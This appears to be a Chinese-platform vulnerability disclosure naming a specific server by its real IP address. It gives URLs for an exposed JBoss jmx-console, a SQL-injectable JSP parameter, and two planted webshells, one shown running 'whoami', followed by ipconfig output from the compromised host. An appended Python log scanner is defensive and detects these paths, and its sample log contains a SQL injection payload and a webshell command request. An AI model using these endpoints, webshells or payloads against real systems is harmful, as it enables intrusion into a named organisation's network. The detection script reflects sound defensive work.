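2015-04-27: Details reported to the vendor; awaiting the vendor's response
2015-05-02: The vendor has actively ignored the vulnerability; details disclosed to the public
I am a little green dragon, I have many little secrets, and I'm not telling you...
JBoss unauthorized access: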
http://110.80.10.170:8081/jmx-console/
SQL injection:
http://110.80.10.170:8081/oa/notneedlogin/checkusercodelevel.jsp?userid=admin
The userid parameter is injectable via GET.
Some of the webshells:
http://110.80.10.170:8081/zmeu/cs.jsp
http://110.80.10.170:8081/zecmd/zecmd.jsp
Administrator privileges:
http://110.80.10.170:8081/zecmd/zecmd.jsp?comment=whoami
sqlmap results:
Database: fjorgan [135 tables]
Internal network IP; further penetration is possible:
Command: ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : cnooc-servers
   Primary Dns Suffix . . . . . . . :
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter 本地连接:

   Connection-specific DNS Suffix . :
   Description . . . . . . . . . . . : IBM USB Remote NDIS Network Device
   Physical Address. . . . . . . . . : 5E-F3-FD-35-25-CB
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IP Address. . . . . . . . . . . . : 169.254.95.120
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCP Server . . . . . . . . . . . : 169.254.95.118
   Lease Obtained. . . . . . . . . . : 2015年4月27日 15:10:26
   Lease Expires . . . . . . . . . . : 2015年4月27日 15:30:26

Ethernet adapter 外网:

   Connection-specific DNS Suffix . :
   Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2
   Physical Address. . . . . . . . . : 5C-F3-FC-DA-26-1A
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.10.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.249
   DNS Servers . . . . . . . . . . . : 218.85.157.99
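I won't go any deeper; dumping the database and pivoting through the internal network are both grunt work.
Please take the system offline immediately and bring it back online only after remediation is complete. Please check for other issues yourselves. Thanks to the ops folks for the hard work!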
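For the self-check the report asks for, the following is an added example (not part of the original report) that scans web access logs for the three things it describes: a reachable /jmx-console/, requests to the listed webshell paths, and userid values on the injectable JSP that fall outside a plain account name. The Common Log Format, the userid character set and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths taken from the report above.
JMX_CONSOLE = "/jmx-console"
WEBSHELLS = {"/zmeu/cs.jsp", "/zecmd/zecmd.jsp"}
SQLI_ENDPOINT = "/oa/notneedlogin/checkusercodelevel.jsp"
# Assumption: a legitimate userid is a short alphanumeric account name.
USERID_OK = re.compile(r"[A-Za-z0-9_.-]{1,32}")
# Request target and status code of a Common Log Format entry (assumed format).
REQ = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log, not from the report; client IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Apr/2015:15:01:02 +0800] "GET /jmx-console/ HTTP/1.1" 200 5120
203.0.113.5 - - [27/Apr/2015:15:02:10 +0800] "GET /oa/notneedlogin/checkusercodelevel.jsp?userid=admin HTTP/1.1" 200 12
203.0.113.5 - - [27/Apr/2015:15:02:11 +0800] "GET /oa/notneedlogin/checkusercodelevel.jsp?userid=admin%27%20AND%20%271%27%3D%271 HTTP/1.1" 200 12
203.0.113.5 - - [27/Apr/2015:15:05:40 +0800] "GET /zecmd/zecmd.jsp?comment=whoami HTTP/1.1" 200 64
198.51.100.7 - - [27/Apr/2015:15:06:00 +0800] "GET /oa/index.jsp HTTP/1.1" 200 2048
"""

def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = REQ.search(line)
    if not m:
        return []
    url, status = urlsplit(m.group(1)), m.group(2)
    path = url.path.lower()
    query = parse_qs(url.query, keep_blank_values=True)  # values are percent-decoded
    findings = []
    # A 200 means the console was served; a protected console answers 401/403.
    if (path + "/").startswith(JMX_CONSOLE + "/") and status == "200":
        findings.append("jmx-console returned 200")
    if path in WEBSHELLS:
        findings.append("webshell path requested")
        if "comment" in query:
            findings.append("webshell command parameter present")
    if path == SQLI_ENDPOINT:
        if any(not USERID_OK.fullmatch(v) for v in query.get("userid", [])):
            findings.append("userid outside expected character set")
    return findings

def scan(text):
    """Return [(line_number, findings)] for every line with at least one finding."""
    results = ((n, classify(l)) for n, l in enumerate(text.splitlines(), 1))
    return [(n, f) for n, f in results if f]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, "; ".join(findings))
```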
Severity: No impact (ignored by vendor)
Ignored at: 2015-05-02 15:46
Vulnerability Rank: 15 (WooYun rating)
None yet